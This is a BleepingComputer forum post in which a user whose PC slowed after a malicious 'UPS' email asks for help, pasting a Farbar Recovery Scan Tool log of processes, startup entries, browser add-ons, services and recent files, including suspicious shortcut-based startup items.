Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CPU running at near 100% with nothing open


  • This topic is locked This topic is locked
24 replies to this topic

#1 pkight

pkight

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 04 November 2016 - 01:46 PM

My system has been bogged down to a crawl since I opened an email (UPS notification) which contain a ransom note, etc.  I have been working with somebody else to clean up some issues but now he says it's time to post here for additional help.  He had me download and run CC Cleaner and Malwarebytes and that found a few things. Task Manager shows "regsvr32.exe" using about 40% fo the CPU and "svchost.exe" using about 50% of the CPU when I have nothing open.  I have done the prep work requested and the logs are posted below.  All help is really appreciated.

 

Thanks

Pat

 

Here are the logs:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-11-2016
Ran by Pat (administrator) on PAT-PC (04-11-2016 10:02:56)
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Loaded Profiles: Pat (Available Profiles: Pat)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Carbonite, Inc.) C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Mobile Device Center] => C:\Windows\WindowsMobile\wmdc.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1004064 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Carbonite Backup] => C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe [1154744 2016-05-19] (Carbonite, Inc.)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2153472 2009-04-10] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2153472 2009-04-10] (Microsoft Corporation)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [6889176 2016-09-28] (Piriform Ltd)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2008-01-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{AA555C5C-7EFB-4FA2-B180-015E64B29B2C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CB9C20A5-549E-4A87-B481-B8D6C1898EC8}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130901137549257230&GUID=022E0370-D2B1-4B56-8A8B-3C53685A8927
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/dell?hl=en&client=dell-usuk&channel=us&ibd=0071127
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://home.jzip.com
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKU\.DEFAULT -> {CCC7A320-B3CA-4199-B1A6-9F516DD69829} URL = hxxp://us.yhs.search.yahoo.com/avg/search?fr=yhs-avgb-chrome&type=yahoo_avg_hs2-tb-web_chrome_us&p={searchTerms}
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=chr-i3752
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2015-09-24] (Adobe Systems Incorporated)
BHO: Spybot-S&D IE Protection -> {53707962-6F74-2D53-2644-206D7942484F} -> C:\Program Files\Spybot - Search & Destroy\SDHelper.dll [2009-01-26] (Safer Networking Limited)
BHO: Yahoo! IE Services Button -> {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} -> C:\Program Files\Yahoo!\Common\yiesrvc.dll [2007-12-12] (Yahoo! Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\Hewlett-Packard\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2007-11-06] (Hewlett-Packard Co.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/5/b/0/5b0d4654-aa20-495c-b89f-c1c34c691085/LegitCheckControl.cab
DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-20] [not signed]
FF HKLM\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (HP Smart Print) - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension [2013-02-22] [not signed]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-09] [not signed]
FF HKLM\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_205.dll [2016-10-26] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [2008-03-19] (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2008-07-10] ()
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2013-12-23] (Google, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @pack.google.com/Google Updater;version=14 -> C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll [2011-09-16] (Google)
FF Plugin: @real.com/nppl3260;version=16.0.3.51 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll [2013-10-09] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [2012-10-10] (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [2012-10-10] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll [2013-10-09] (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-08-14] (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-06] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-06] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Pat\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-04] (Citrix Online)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-26] (Google Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-26] (Google Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @zoom.us/ZoomVideoPlugin -> C:\Users\Pat\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2012-09-04] (Zoom Video Communications, Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default [2016-11-04]
CHR Extension: (Google Slides) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-25]
CHR Extension: (Google Docs) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-25]
CHR Extension: (Google Drive) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-25]
CHR Extension: (YouTube) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-25]
CHR Extension: (Google Sheets) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-25]
CHR Extension: (InboxAce) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkfcmeoepjhclglafbppmeidjjolcgid [2016-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-25]
CHR Extension: (RealDownloader) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2015-02-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-25]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
StartMenuInternet: chrome.exe - C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
StartMenuInternet: Google Chrome - C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AERTFilters; C:\Windows\system32\AERTSrv.exe [77824 2007-12-05] (Andrea Electronics Corporation)
S4 Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [116040 2008-07-10] (Apple Inc.)
R2 CarboniteService; C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe [6370488 2016-05-19] (Carbonite, Inc. (www.carbonite.com))
S4 CCALib8; C:\Program Files\Canon\CAL\CALMAIN.exe [86606 2005-06-02] (Canon Inc.) [File not signed]
S4 DSBrokerService; C:\Program Files\DellSupport\brkrsvc.exe [70656 2007-03-19] () [File not signed]
S4 Garmin Core Update Service; C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [387928 2014-02-12] (Garmin Ltd or its subsidiaries)
S4 GoogleDesktopManager; C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe [1838592 2007-11-27] (Google) [File not signed]
R3 hpqcxs08; C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqcxs08.dll [217088 2008-03-07] (Hewlett-Packard Co.) [File not signed]
S2 hpqddsvc; C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqddsvc.dll [139264 2007-11-06] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [104200 2016-08-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [280864 2016-08-30] (Microsoft Corporation)
S4 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 SBSDWSCService; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [1153368 2009-01-26] (Safer Networking Ltd.)
S4 sprtsvc_dellsupportcenter; C:\Program Files\Dell Support Center\bin\sprtsvc.exe [201968 2008-08-13] (SupportSoft, Inc.)
S4 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [73728 2006-09-14] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-19] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 AFS; C:\Windows\system32\Drivers\AFS.sys [77004 2008-04-24] (Oak Technology Inc.) [File not signed]
S3 DSproct; C:\Program Files\DellSupport\GTAction\triggers\DSproct.sys [4736 2006-10-05] (Gteko Ltd.) [File not signed]
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [30976 2014-04-01] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [24448 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [170200 2016-11-04] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [53120 2016-03-10] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [252808 2016-08-25] (Microsoft Corporation)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-04 10:02 - 2016-11-04 10:02 - 00000000 ____D C:\FRST
2016-11-03 05:46 - 2016-11-03 05:46 - 00041281 _____ C:\Users\Pat\Documents\Documents\Documents\Services running.txt
2016-11-03 05:12 - 2016-11-03 05:12 - 00089631 _____ C:\Users\Pat\Documents\Documents\Documents\Fix list.pdf
2016-11-02 09:56 - 2016-11-02 09:56 - 00000000 ____D C:\Users\Pat\AppData\Local\ESET
2016-11-02 06:49 - 2016-11-03 15:55 - 00000000 ____D C:\Users\Pat\AppData\LocalLow\HPAppData
2016-11-01 15:35 - 2016-11-01 15:35 - 00001070 _____ C:\MBAM 11.1.16.txt
2016-11-01 11:59 - 2016-11-04 09:23 - 00170200 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-01 11:56 - 2016-11-01 11:56 - 00000861 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\Program Files\Malwarebytes Anti-Malware
2016-11-01 11:56 - 2016-03-10 14:09 - 00053120 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-01 11:56 - 2016-03-10 14:08 - 00126336 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-01 11:56 - 2016-03-10 14:08 - 00024448 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-01 10:58 - 2016-11-01 10:58 - 00000766 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-11-01 10:58 - 2016-11-01 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-11-01 10:58 - 2016-11-01 10:58 - 00000000 ____D C:\Program Files\CCleaner
2016-11-01 10:12 - 2016-11-01 10:12 - 00206234 _____ C:\Users\Pat\Documents\Documents\Documents\aa_patch in msconfig.pdf
2016-10-31 11:33 - 2016-10-31 11:33 - 00162429 _____ C:\Users\Pat\Documents\Documents\Documents\Interjet trip.pdf
2016-10-25 10:57 - 2016-10-25 11:16 - 00000000 ____D C:\ProgramData\~0
2016-10-20 15:44 - 2016-10-20 15:44 - 00150414 _____ C:\Users\Pat\Documents\Documents\Documents\Actual vs. Budget Sept 2016.pdf
2016-10-20 15:44 - 2016-10-20 15:44 - 00082667 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Financial Report Sept 2016.pdf
2016-10-20 15:23 - 2016-10-20 15:40 - 00011119 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Financial Report Sept 2016.xlsx
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-04 10:01 - 2013-03-11 16:11 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-04 09:40 - 2006-11-02 03:22 - 72876032 _____ C:\Windows\system32\config\software_previous
2016-11-04 09:40 - 2006-11-02 03:22 - 19398656 _____ C:\Windows\system32\config\system_previous
2016-11-04 09:39 - 2014-04-25 17:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlackBerry
2016-11-04 09:39 - 2012-02-03 07:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-11-04 09:39 - 2012-02-03 07:41 - 00000000 ____D C:\Program Files\QuickTime
2016-11-04 09:39 - 2009-03-24 10:04 - 00000000 ____D C:\Program Files\Common Files\Research In Motion
2016-11-04 09:39 - 2008-10-23 14:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-11-04 09:39 - 2008-02-20 08:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-22 17:13 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-22 17:13 - 00000000 ____D C:\Program Files\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-13 14:30 - 00000000 ____D C:\Users\Pat
2016-11-04 09:39 - 2007-11-27 01:54 - 00000000 ____D C:\Program Files\Common Files\SureThing Shared
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\system32\spool
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\system32\Msdtc
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\registration
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\inf
2016-11-04 09:37 - 2014-04-25 17:09 - 00000000 ____D C:\Program Files\Research In Motion
2016-11-04 09:33 - 2006-11-02 03:22 - 60555264 _____ C:\Windows\system32\config\components_previous
2016-11-04 09:33 - 2006-11-02 03:22 - 00262144 _____ C:\Windows\system32\config\sam_previous
2016-11-04 08:57 - 2009-12-26 22:19 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-04 08:57 - 2009-12-26 22:19 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-04 08:57 - 2009-06-29 20:52 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA.job
2016-11-04 08:57 - 2009-06-29 20:52 - 00000848 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core.job
